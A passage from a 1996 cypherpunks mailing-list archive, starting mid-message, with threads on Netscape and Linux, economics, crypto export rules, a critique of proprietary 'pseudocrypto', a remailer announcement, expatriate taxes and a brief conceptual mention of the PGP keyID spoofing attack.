when i try to load some HTML pages...i assume it shouldn't and we got
ansolutly no probs with Netscape under windows.
SO we just wondered if it's not a kind of support to micro$oft.
Maybe Linux is 'not officially supported', but have to know unix is the
most used OS, and that since Linux is free, many people use it. So when
will you accept to recognize Linux as an entire OS ?? i just reinstalled
Windows95 on a HD yesterday and it has already crached 2x. Windows is
expensive and it crashes. Why should we pay for a fucked 'OS' ?

Arnauld Dravet
scraver@mnet.fr
sChTrOuMf on Undernet




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 19 Aug 1996 00:53:49 +0800
To: Mike McNally <m5@tivoli.com>
Subject: Re: MD5 completely broken!
In-Reply-To: <32170F4A.56F2@tivoli.com>
Message-ID: <Pine.SUN.3.91.960818103543.4112A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 18 Aug 1996, Mike McNally wrote:
> 
> I'll trade ya my bridge for it.  (It's in New York now; I'd have to 
> go get it.)

Is this bridge SNMP aware?

---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Sun, 18 Aug 1996 15:16:06 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Software manpower exports and the power of governments
In-Reply-To: <199608180349.UAA13056@dns2.noc.best.net>
Message-ID: <Pine.OSF.3.91.960818103202.3366C-100000@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 17 Aug 1996, James A. Donald wrote:

> At 13:23 16/08/96 -0700, James A. Donald wrote:
> 
> At 06:17 PM 8/17/96 +0600, Arun Mehta wrote:
> > Look, governments in the 3rd world are often stupid and corrupt
> > -- no doubt that contributes to poverty, but that isn't the only
> > reason. I'm sure one of the reasons is cultural: 
> 
> Was the culture of the refugees who fled to Hong Kong any different
> from those who failed to escape from Communist China?

The individual can change far faster than the community, which is why
immigrants to the US, for instance, do so much better than back home. It
has, in the case of economic matters, to do with attitudes of government,
the chambers of commerce and all the institutions that influence economic
policy -- which can take long to change.

Arun





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 19 Aug 1996 04:32:59 +0800
To: cypherpunks@toad.com
Subject: Re: MD5 completely broken!
In-Reply-To: <Pine.SUN.3.91.960818103543.4112A-100000@tipper.oit.unc.edu>
Message-ID: <H65usD19w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Simon Spero <ses@tipper.oit.unc.edu> writes:

> On Sun, 18 Aug 1996, Mike McNally wrote:
> >
> > I'll trade ya my bridge for it.  (It's in New York now; I'd have to
> > go get it.)
>
> Is this bridge SNMP aware?

We'll cross this bridge when we come to it.

(Hey, it costs us $7 to cross the Verazano bridge, it must be good to own one.)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 19 Aug 1996 04:27:08 +0800
To: cypherpunks@toad.com
Subject: CS First Boston lawsuit
Message-ID: <Rq6usD20w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


In a lawsuit files in federal court in New York City, CS First Bostom has
charged an unknown party with libel, slander and violation of the Federal
Telecommunications Act, as well as with impoerly obtaining confidential
financial information and sending it out in e-mail messages.

The lawsuit seeks damages of at least $1M against "FBCbuster" and "FBCbuster2",
the aliases of an America Online AOL) subscriber or subscribers. AOL was not
named as a defendant in the lawsuit, which concerns two separate e-mail
messages sent to First Boston employees.

The suit sais the firsy e-mail message, which was sent on March 3, included a
"macabre poem" about the destruction of the firm. In a second message, sent a
week later, the lswsuit states that the writer included confidential salary
information about current and former officers of the firm.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Mon, 19 Aug 1996 03:11:45 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Possible opportunity for school recruitment
In-Reply-To: <01I8EDF65HPS9JD95Q@mbcl.rutgers.edu>
Message-ID: <Pine.SV4.3.91.960818115011.21967E-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


I wanna go to the Internet Big Rig Tractor Pull contest!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Wehlage <jwilk@iglou.com>
Date: Mon, 19 Aug 1996 02:47:19 +0800
To: cypherpunks@toad.com
Subject: Private Idaho
Message-ID: <m0usAC7-0003CpC@mail.iglou.com>
MIME-Version: 1.0
Content-Type: text/plain


Could anyone tell me the URL of the latest version of Private Idaho..... 

Thank You!
==========================================
   Blake Wehlage <jwilk@iglou.com>
   ‡±" RëVðLû¡ØÑ Bø+ (c)ÖmP@ñ¥ (tm) "±‡
 Goto: http://members.iglou.com/jwilk





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hayashi_Tsuyoshi <take@barrier-free.co.jp>
Date: Sun, 18 Aug 1996 13:24:10 +0800
To: jsw@netscape.com
Subject: Re: Final release of Navigator (with strong crypto) now available
In-Reply-To: <321677C2.663B@netscape.com>
Message-ID: <199608180315.MAA15543@ns.barrier-free.co.jp>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 17 Aug 1996 18:54:10 -0700, Jeff Weinstein said:
 >The final release of Navigator 3.0, complete with non-exportable
 >strong crypto, is now available for download by US citizens.  Note

Exportable (non-strong crypto) version is also available
from Japan?

# I use Linux on i486.

- Tsuyoshi Hayashi <take@barrier-free.co.jp>
- PGP public key: http://www.barrier-free.co.jp/take/pgpkey
- (CF 27 34 5B 46 FA 2A 12  D2 4C E3 F7 2A 45 E0 22)
- Barrier Free, Inc. (established on 25 Jan 1996)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Mon, 19 Aug 1996 03:58:48 +0800
To: Bart Croughs <bart.croughs@tip.nl>
Subject: Re: National Socio-Economic Security Need for Return Key
In-Reply-To: <01BB8D2F.B10B2EA0@groningen12.pop.tip.nl>
Message-ID: <3217525C.72C@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Bart Croughs typed, deftly avoiding the enormous key labeled "Return":
>
> I don't blame you when you get the impression that Austrian
> methodology, compressed in a couple of sentences, is sophist
> gibberish.

Seems to me that ya gotta be mighty careful when interpreting piles
of egghead "gedanken" experiments.  If you feel you can squeeze the
contents of one more book into your head, I'd suggest one by another
economist (sorta), Stuart Chase's "Tyranny of Words".

______c_________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX * For the time being,
       m5@tivoli.com * m101@io.com       *    
      <URL:http://www.io.com/~m101>      * three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Mon, 19 Aug 1996 03:22:36 +0800
To: Adamsc <Adamsc@io-online.com>
Subject: Re: Burden of proof
In-Reply-To: <19960818074654046.AAA160@IO-ONLINE.COM>
Message-ID: <Pine.SV4.3.91.960818122245.21967I-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 18 Aug 1996, Adamsc wrote:

> On the other hand, if your employer was willing to do some sneaky ecash
> stuff, then it might get interesting.

   Which alternate universe are you in, Chris, where employers don't want
to DECLARE AND DEDUCT their salary expenses - every last penny of it? 
Which planet is that, where a company can afford to set up a structural
cost in its operations, that its competitors don't have? 



> "Sorry, this is all I have left"

   No problem, they will get a judgement against all your future earnings.


There are ways around the taxation problem, but they don't involve hiding 
facts from the US Govt. This is the cold, hard reality. Get used to it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Sun, 18 Aug 1996 20:37:46 +0800
To: cypherpunks@toad.com
Subject: Re: Final release of Navigator (with strong crypto) now available
Message-ID: <199608181037.MAA14188@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein (jsw@netscape.com) wrote:

: The final release of Navigator 3.0, complete with non-exportable
: strong crypto, is now available for download by US citizens.  Note
: that this is the released version of 3.0, so it will not expire.
: You can get it from:

Would it be possible to both supply an Linux ELF and a.out binary ?

: 	http://wwwus.netscape.com/eng/US-Current/

: 	--Jeff

--
  Alex de Joode  | Replay IP Service & Web DZign  --  The Netherlands
usura@replay.com | http://www.replay.com       mailto:info@replay.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Mon, 19 Aug 1996 05:36:55 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: MD5 completely broken!
In-Reply-To: <HwTusD2w165w@bwalk.dm.com>
Message-ID: <Pine.3.89.9608181231.A18509-0100000@netcom20>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 18 Aug 1996, Dr.Dimitri Vulis KOTM wrote:

> The following is true. There used to be company in Silicon Vallye that marketed
> compression software guaranteed to reduce any file to no more than 128K, no
> matter how large the input. That side worked. The decompression side didn't.
> 
I remember reading this file somewhere...it was satirizing either 
Microsoft or IBM, and in a very serious manner, described a revolutionary 
new compression program that would reduce any file to a size of one 
byte.  However, in order to decompress the file, a larger file containing
all of the information of the original file needed to be attached to it.  
Fun to read...

---

Zach Babayco

zachb@netcom.com  <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 19 Aug 1996 05:46:42 +0800
To: "Chris Adams" <null@void.com>
Subject: Re: forget photographing license plates!
Message-ID: <2.2.32.19960818194231.00b28600@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:46 PM 8/17/96 -0800, Adamsc wrote:
>On 15 Aug 96 01:31:08 -0800, null@void.com wrote:
>
>>"In the 22 Jul 1996 issue of Fortune was an interesting look into the future
>>of automobile electronics, "Soon Your Dashboard Will Do Everything (Except
>>Steer)".  "
>>From the control center, they can "electronically reach into the car" to
>>unlock the doors, or honk the horn and flash its lights."
> ^^^^^^^^^^^^^^^^
>How long do you think it would be before thieves subverted this feature?

It already happens now.

There is a device for determining the code sequence and frequency of
electronic locks that was designed for locksmiths and repair personel.
Thieves have been using it for breaking into vehicles.  The scam usually
happens in large mall parking lots. They just sit in their car and wait for
you to open yours, watching for the lock information displayed.  Once you
are gone, they unlock it and swipe all of your freshly purchaced goodies.

Theives have also been known to use replacement garage door openers to open
up the homes of those too ignorant to change the default codes of their
garage door systems.

Something to be said for low tech in this case...
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 19 Aug 1996 05:12:17 +0800
To: cypherpunks@toad.com
Subject: Re: BlackNet as a Distributed, Untraceable, Robust Data Haven
In-Reply-To: <199608181532.IAA18019@mail.pacifier.com>
Message-ID: <ey9usD21w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell <jimbell@pacifier.com> writes:

> At 10:40 PM 8/17/96 -0700, Vladimir Z. Nuri wrote:
> >
> >>I have to speak up here and say that there is an actual working exemplar of
> >>a distributed, untraceable data haven. While it lacks a robust _payment_
> >>mechanism, that is also untraceable, so does the "Visit Port Watson"
> >>example (which has never actually existed).
> >
> >agree with Jim Bell that blacknet by any stretch of the imagination
> >is not a "data haven".
>
> I've not yet commented on this thread!  Sounds like you're confusing me with

It's hard to keep track of Lance's tentacles.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 19 Aug 1996 05:14:15 +0800
To: cypherpunks@toad.com
Subject: Re: Drive the SF Central Freeway, have your license plate
In-Reply-To: <9608180913.AB01288@xenon.xe.com>
Message-ID: <Pine.LNX.3.93.960818123852.945A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 17 Aug 1996, Bob Jonkman wrote:
> > >At 21:55 8/8/96, i am not a number! wrote:
> > >>CBS radio news this morning: 80,000 commuters traveling the
> > >>central f'way in SF will have information mailed to them
> > >>regarding the quake retrofit How?  Their license plates have
> > >>been photographed.
> > At 10:45 PM 8/8/96 -0700, Lucky wrote:
> > >You *are* making this up, right? Please say you did.
> to get your drivers license or car registration renewed...
> Big Brother is not only watching, he's recording your location
> and destination, measuring your distance travelled, and charging 
> you for the privilege of driving...

     No, you are paying to use the road. You allowed to purchase the land 
to build your own road, and probably could even charge to use it. Assuming 
of course that you could _afford_ to. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 19 Aug 1996 05:08:00 +0800
To: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Subject: Re: Software manpower exports and the power of governments
In-Reply-To: <Pine.OSF.3.91.960818103202.3366C-100000@giasdl01.vsnl.net.in>
Message-ID: <Pine.LNX.3.93.960818132639.945B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 18 Aug 1996, Arun Mehta wrote:
> On Sat, 17 Aug 1996, James A. Donald wrote:
> > At 13:23 16/08/96 -0700, James A. Donald wrote:
> > At 06:17 PM 8/17/96 +0600, Arun Mehta wrote:
> > > Look, governments in the 3rd world are often stupid and corrupt
> > > -- no doubt that contributes to poverty, but that isn't the only
> > > reason. I'm sure one of the reasons is cultural: 
> > Was the culture of the refugees who fled to Hong Kong any different
> > from those who failed to escape from Communist China?
> The individual can change far faster than the community, which is why
> immigrants to the US, for instance, do so much better than back home. It

     Of course the individual immigrant doing better in America _could_ have
something to do with the high degree of "class mobility" (note quotes).

> has, in the case of economic matters, to do with attitudes of government,
> the chambers of commerce and all the institutions that influence economic
> policy -- which can take long to change.

     Which falls back on the community "culture" in America. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: C Matthew Curtin <cmcurtin@research.megasoft.com>
Date: Mon, 19 Aug 1996 04:32:32 +0800
To: Info@flagler.com
Subject: THE POUCH
Message-ID: <199608181757.NAA10242@goffette.research.megasoft.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Allow me to quote from your web page:
http://www.flagler.com/security.html

Quote #1:
"The POUCH is a secure e-mail terminal program for IBM compatible
computers. It uses a secret key phrase, advanced cryptographic
techniques and several unpublished algorithms to protect data in the
body of e-mail messages. The key phrase, which can be up to 48 bytes
long, is easily remembered and communicated. The POUCH is highly
resistant to all known forms of cryptographic attack."

Quote #2:
"We warrant that the product when delivered to you has no short cuts,
covert channels or secret solutions of any kind. No other warranty,
either expressed or implied is given."

These two statements are contradictory; an unpublished algorithm is
itself a secret solution, and a covert channel.

Why is it that software manufacturers keep popping up and spewing
nonsense? Obscurity is not security. Making the algorithm proprietary
does extremely little in making it resistant to attack. All of your
statements regarding the security of "The Pouch" are worthless, for
you have no data with which to substantiate your claims.

If it is any good, there's no way for us to know. But your marketing
of the product has every indication that it's nothing more than smoke
and mirrors. To coin a phrase, "pseudocrypto."

Please refrain from your bogus marketing techniques. This kind of
stuff, by claiming to be "real cryptography" makes real cryptographers
look bad.

- -- 
C Matthew Curtin        MEGASOFT, LLC        Director, Security Architecture
I speak only for myself.  Don't whine to anyone but me about anything I say.
Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet
cmcurtin@research.megasoft.com http://research.megasoft.com/people/cmcurtin/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Have you encrypted your data today?

iQCVAwUBMhdZaBhyYuO2QvP9AQHaxQP+OvqYc9U/3BTPwnEhL/9ADkzL+ulhILpj
1zbyhktoCB4yMB13WQgm05DM6lolUufo63nkhsX4giMhrQ2XCBeM5/8pxJOD2ThY
3+foxma7e3tUv8r6PjNlnhn2TzVPPgbN+6NdpUCbNtOpG8GsD4EdQ35S+H0Y+aJm
75FfHfaDrNQ=
=6Zxy
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Shawn Dudar <sdudar@westeel.ca>
Date: Mon, 19 Aug 1996 05:10:33 +0800
To: Blake Wehlage <jwilk@iglou.com>
Subject: Re: Private Idaho
Message-ID: <2.2.32.19960818190412.00300e94@mail.solutions.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:55 AM 8/18/96 EDT, Blake Wehlage wrote:
>Could anyone tell me the URL of the latest version of Private Idaho..... 
>
>Thank You!
>==========================================
>   Blake Wehlage <jwilk@iglou.com>
>   ‡±" RëVðLû¡ØÑ Bø+ (c)ÖmP@ñ¥ (tm) "±‡
> Goto: http://members.iglou.com/jwilk
>
>

http://www.eskimo.com/~joelm/


   __________________
  / PGP public key   |___________________________
 /   available on    |     ~ Shawn Dudar ~       |___________________
(     keyserver      |                           |Fingerprint:      /
 \ KeyID: 0xC0AF244D |  <sdudar@solutions.net>   |90 AA D0 52 D3 A6/
  \__________________|   <sdudar@westeel.ca>     |93 96 AD C2 CB  (
                   (_____________________________|98 12 C0 FF 30   \
PGP.  Use it!  Protect yourself!               (____________________\
For more info, point your browser to http://www.ifi.uio.no/pgp/


"There are two major products to come out of Berkeley: LSD and UNIX. We 
don't believe this to be a coincidence."
 -- Author Unknown --

"Practice safe eating - always use condiments."
 -- Author Unknown --

"In a press conference held yesterday in Seattle, WA, Bill Gates formally
announced that Microsoft Corporation has declared bankruptcy..."
 -- Dream headline --






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Mon, 19 Aug 1996 05:26:07 +0800
To: cypherpunks@toad.com
Subject: DEADBEEF Attack??
Message-ID: <199608181930.OAA27678@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

I am looking for some detailed information on the "DEADBEEF" attack for key fingerprint spoofing.

If anyone has any information or know where to find it please let me know.

Thanks,

--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Merlin Beta Test Site - WarpServer SMP Test Site

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@alpha.jpunix.com>
Date: Mon, 19 Aug 1996 05:41:04 +0800
To: raph@kiwi.cs.berkeley.edu
Subject: New type-I middleman!
Message-ID: <87sp9kqyq1.fsf@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


The following message is a courtesy copy of an article
that has been posted as well.

-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone!

	I just completed beta testing my Type-I (ghio-style) Middleman
remailer and I'm ready for it to go online publically. Just like the
Middleman type-II (mixmaster) remailer, the type-I Middleman randomly
selects a remailer path to send messages based on Raph Levien's
remailer list. Additionally, to foil traffic analysis, the Middleman
type-I remailer also supports message reordering. This means that
middleman@jpunix.com is now a fully functional type-I/type-II remailer
that uses the middleman random remailer feature in additon to
reordering. All of the available functionlity that you would find in
either a Mixmaster remailer as well as a Cypherpunks remailer is
available in the middleman@jpunix.com remailer. Below is the public
PGP key for middleman@jpunix.com.

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzIXHroAAAEEAPLBq/n4a5ldzm8F51Lk63iHyOJfm+lmxW8PgjbKdAPAJBHk
xUHXEeOX/gQ8RXV0W6vYwmiFcQBA7b4w3iJwptC8GN98t4o31SVHlouQozjMwaVH
eu5dDUg/CJ9P2Wnwc0AtP4s9cBxQho3FK7mjeqhMXKhB2oqliX+quM/iBuHlAAUR
sAGHtD5NaWRkbGVNYW4gVHlwZS1JIFJlbWFpbGVyIGF0IEpQVW5peC5Db20gPG1p
ZGRsZW1hbkBqcHVuaXguY29tPrABA4kAlQMFEDIXMfh/qrjP4gbh5QEBc2kD/1hw
oHPcTasnlSVzMxD68hoCI1GYNNM4JSU+rHS+3PVy++992PcyuhqdH8PhuDozeYkz
C8Q5y4tmddg30ED+/W2QJwYS0iySG3yH4jrvOstws+Kn5LpD1JQJT1qGLVWHpTxG
n5MZO014NGT+wVkySRCornpuaqevTum8ygp+lyPIsAHH
=/xR/
- -----END PGP PUBLIC KEY BLOCK-----


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMhdusVOTpEThrthvAQErOwQAqBZo5D7RaSAiymovj7Y/FU649scaYI+v
JwP9Nm1T9ZQ1rX3mscN/a37PpohKKoLHf9gYvgkJm5kPdODd9HRNoSdBcp72xrxo
JDnhYdAW6iw4c6xZOde7o54maIWuITiN8X1kQcZ591Ava7DaVSdjMypm9hGzq9tx
PRqQEvVDb2I=
=lN7a
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Cobb <stephen@iu.net>
Date: Mon, 19 Aug 1996 04:27:54 +0800
To: Vincent Cate <vince@offshore.com.ai>
Subject: Re: US Taxes on X-Pats
Message-ID: <1.5.4.32.19960818182834.00bb88ac@iu.net>
MIME-Version: 1.0
Content-Type: text/plain


Pardon me for jumping in...but a year ago I won a case in tax court brought
aainst me by the IRA for not paying taxes on income earned while living
overseas...apart from the verdict, the whole thing was a complete farce!

My advice is to research the subject in detail before leaving the country
and file IRS returns faithfully every year regardless of where you live even
if you owe no tax (I owed no tax so filed no returns, penalty for not filing
= % of tax owed, so no penalty for not filing, but only IF the IRS agrees
you don't owe).

Yes, there has been talk in the Clinton administration of dropping the
overseas earning provision. You might want to email either Sen. Byron Dorgan
or Sen. Kent Conrad of N.D. since both these guys were State Tax
Commssioners before going to Washington and seem to be clued in on federal
tax issues. The report I read in the Orlando Sentinel suggested that Clinton
felt the exclusion was a money loser desined to help US corporations get
employees to work overseas. However, it seems to me that it is also part of
the complex web of international tax treaties designed to prevent double
taxation. If you are a US citizen earning in a country that has an income
tax they are likely going to expect you to pay tax, just as we tax foreign
nationals living here.

My impression is that many IRS staff lack in-depth knowledge of this very
complex area (for example, I paid tax on my overseas income to the
government of the country in which I was living when I earned it and that
country has a tax treaty with the US...after about 6 very scary phone calls
the agent assigned to the case agreed that I did not owe income tax...but
then he tried to hit me up for thousands fo dollars in self-employed soc sec
contribution -- when I told him that was also covered under a reciprocal
treaty it was complete news to him...he asked me, and I wish I had taped the
call, to send him the IRS document in which I had read this!)

The result is often months of very stressful waiting, staring huge penalties
in the face, while they learn up on the subject and say "I guess you're
right, you don't owe that $60,000 in unpaid tax and penalties we asked the
judge to award us." I still have a state tax lien triggered by this bogus
action against me lying around on one of my credit reports.

Respectfully...Stephen

ps The recent US legislation denying soc sec benefits to legal aliens seems
to be a breach of the referred to above. 

pps The relation to cypto is :-)? 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Cobb <stephen@iu.net>
Date: Mon, 19 Aug 1996 04:28:45 +0800
To: Hallam-Baker <hallam@ai.mit.edu>
Subject: Re: Schlafly on crypto
Message-ID: <1.5.4.32.19960818182839.00bde080@iu.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:44 PM 8/17/96 -0400, you wrote:
>I don't think that Schlafy is a usefull aly any more than Bob Dole
>basically its just opportunist politicians latching onto the rhetoric
>of debates without engaging in the argument. Dole senses that the mood
>of the country is pro crypto so he supports that, he senses that it
>is anti porn so he will support that.
>
>Basically Schlafy is playing the same game. She is saying things that
>she knows will curry favour so she can get people to join her Wacko
>club. 
>
Phil
   I tend to agree...anyone who thinks victory for Dole/Kemp in 96 means
strong free unescrowed crypto in 97 needs to read a few history books.
   Stephen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Cobb <stephen@iu.net>
Date: Mon, 19 Aug 1996 04:36:36 +0800
To: m5@tivoli.com
Subject: Re: Hackers invade DOJ web site
Message-ID: <1.5.4.32.19960818184633.00c0c884@iu.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:03 PM 8/17/96 -0500, you wrote:
>CNN online (http://www.cnn.com) is reporting a "breakin" by "hackers"
>to the DOJ web site.  They don't elaborate exactly how thy did it.
> 
>______c_________________________________________________________________
>Mike M Nally * Tiv^H^H^H IBM * Austin TX * For the time being,
>       m5@tivoli.com * m101@io.com       *    
>      <URL:http://www.io.com/~m101>      * three heads and eight arms.
>
If anyone happens to know which vulnerability(s) this hack exploited I would
be most grateful if they could let me know, either on the list or privately
(stephen@iu.net). I am not asking for someone to publish the attack script
or specifics of what was done to get in, but I would like to know what holes
were used (e.g. cgi script error).

Respectfully...Stephen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 19 Aug 1996 06:00:41 +0800
To: cypherpunks@toad.com
Subject: Re: Schlafly on crypto
In-Reply-To: <1.5.4.32.19960818182839.00bde080@iu.net>
Message-ID: <HDgVsD27w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Stephen Cobb <stephen@iu.net> writes:
>    I tend to agree...anyone who thinks victory for Dole/Kemp in 96 means
> strong free unescrowed crypto in 97 needs to read a few history books.

Yes - their platform contained mucho guano and nothing about GAK.

Still, they have no blood on their hands - yet.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 19 Aug 1996 05:54:26 +0800
To: cypherpunks@toad.com
Subject: Re: THE POUCH
In-Reply-To: <199608181757.NAA10242@goffette.research.megasoft.com>
Message-ID: <yegVsD28w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


C Matthew Curtin <cmcurtin@research.megasoft.com> writes:
> and mirrors. To coin a phrase, "pseudocrypto."

I love it!

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Mon, 19 Aug 1996 05:50:31 +0800
To: "William H. Geiger III" <whgiii@amaranth.com>
Subject: Re: DEADBEEF Attack??
In-Reply-To: <199608181930.OAA27678@mailhub.amaranth.com>
Message-ID: <9608181941.AA19952@pickled-herring.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

> I am looking for some detailed information on the "DEADBEEF" attack
> for key fingerprint spoofing.
> 
> If anyone has any information or know where to find it please let me know.

I'm not sure what you mean by the DEADBEED attack on fingerprint
spoofing.  There is a DEADBEEF attack on keyIDs, where you can
generate a key that matches the keyID, since the keyID is only the
lowest bits of the key's modulus.  Basically, you can choose p and q
such that ((P*Q) & 0xFFFFFFFF) is the keyID you want to mimick.

There have been a number of lengthy posts about it in the past.  I'd
suggest you look in the cypherpunks or other appropriate archive.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 19 Aug 1996 08:26:39 +0800
To: Bart  Croughs <cypherpunks@toad.com>
Subject: Re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <199608182241.PAA18496@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:59 PM 8/18/96 +-200, Bart  Croughs wrote:
> No, but a number of posters claimed they were Austrians, 
> and among them was Timothy May. So if I can show that 
> Timothy's statements contradict the economic theories 
> he says he supports on the most fundamental level 
> (the level of methodology), 

Obviously the Austrians, like anyone with half a brain, said that more
capital means more wealth for everyone, and more capital relative
to workers means a bigger share for the workers.

It does not follow however, that the Austrians said that 
if the government directs the flow of other peoples capital 
like a farmer watering his fields, the fields so watered will
benefit.



 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Mon, 19 Aug 1996 06:50:17 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: CS First Boston lawsuit
In-Reply-To: <Rq6usD20w165w@bwalk.dm.com>
Message-ID: <32178436.30E4@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


